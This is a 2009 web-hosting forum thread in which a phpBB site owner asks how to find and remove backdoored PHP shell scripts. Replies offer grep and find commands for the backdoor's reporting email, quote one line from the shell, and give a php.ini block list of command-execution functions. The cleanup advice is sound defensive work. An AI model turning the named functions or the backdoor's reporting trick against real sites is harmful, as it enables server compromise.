Portal Home > Knowledgebase > Articles Database > Best way to remove shell scripts?
Best way to remove shell scripts?
| Posted by 1aleem, 09-08-2009, 01:22 PM |
| I hired a coder to work on the phpbb forum I had with an old host, installing modifications with it.
The forum kept going down so I asked my web host staff what the problem was. I had my account terminated, claiming I had installed two shell scripts, and I wasn't to be trusted.
I absolutely know nothing about these scripts, and i need to get rid of them, but i'm scared my new host will do the same thing if I ask for help.
Is there a quick and efficient way to locate and remove these files from my VPS server?
|
| Posted by DesignBear, 09-08-2009, 01:36 PM |
| Ask your old host which scripts they were and were they were located?
|
| Posted by 1aleem, 09-08-2009, 01:54 PM |
| They said a certain shell on your hosting account is backdoored to email the location of the shell to the maker of the php shell.
"$shell_email="mulciber-@hotmail.com";
...I tried to find out what the other one was. They refused to talk to me.
|
| Posted by eth10, 09-08-2009, 02:44 PM |
| grep -r "$shell_email="mulciber-@hotmail.com" .
You will get file name where this is located.
Just remove this line form that file.
|
| Posted by nomankhn, 09-08-2009, 02:54 PM |
| Hello,
Please try this.
find /var/www -type f -exec grep -l "mulciber-@hotmail.com" {} \;
/var/www is the certain directory where you want to search those file or its upto you whatever you want to define that directory that will provide you list of file that contain that email address.
|
| Posted by CodyRo, 09-08-2009, 07:35 PM |
| That's.. sort of a backwards way to do it.. as said above use the -R switch for recursive search..
Should do the trick (the -R is recursive and the -i means case insensitive)
|
| Posted by avelinux, 09-09-2009, 02:11 AM |
| Removing the files is only a temporary fix. If the phpBB software is outdated, it is strongly recommended that you get the software updated or start from scratch. There can potentially be many files or scripts in the web directory of the site or the /tmp directory of the vps which have back door code installed.
|
| Posted by zacharooni, 09-09-2009, 02:18 AM |
| You should probably set some disable_functions in your php.ini like so:
disable_functions = apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,disk_free_space,diskfreespace,dl,highlight_file,ini_alter,ini_restore,op enlog,passthru,phpinfo,proc_nice,shell_exec,show_source,symlink,system
EDIT: I forgot add that this will output errors in error_log provided you have log_errors=On in php.ini, you can then see what file is executing the functions in the disable_functions list.
|
Add to Favourites 
Print this Article
Also Read
